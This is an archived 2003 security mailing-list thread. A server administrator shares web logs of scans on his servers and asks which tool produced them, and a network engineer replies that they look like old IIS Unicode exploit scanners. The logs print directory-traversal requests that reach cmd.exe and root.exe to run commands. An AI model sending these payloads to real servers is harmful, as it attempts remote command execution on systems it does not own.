Looks like old Unicode exploits. Those scanners are all over the place. You could probably go to packetstormsecurity.nl and search for "Unicode" and find one. James Williams Network Systems Engineer West Texas A&M University http://www.wtamu.edu Phone: 806-651-2162 Email: jwilliamsat_private -----Original Message----- From: Danny [mailto:dannyat_private] Sent: Monday, July 28, 2003 10:24 PM To: incidentsat_private Subject: Anyone know this tool? Does anyone happen to know what tool this is? I've seen the exact same scans on 6 of our servers on completely different networks. All the scans have been from different source IP's and all the servers were hit within a space of a few hours. Curiosity is getting the better of me since i've never seen this exact pattern before :) 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" Danny Work - http://www.eBoundary.com - Secure, FreeBSD hosting. Play - http://www.eBoundary.net - Who really sets your electronic boundaries? AIM: eBoundaryTch | ICQ: 3090141 ------------------------------------------------------------------------ --- ------------------------------------------------------------------------ ---- --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 10:00:50 PDT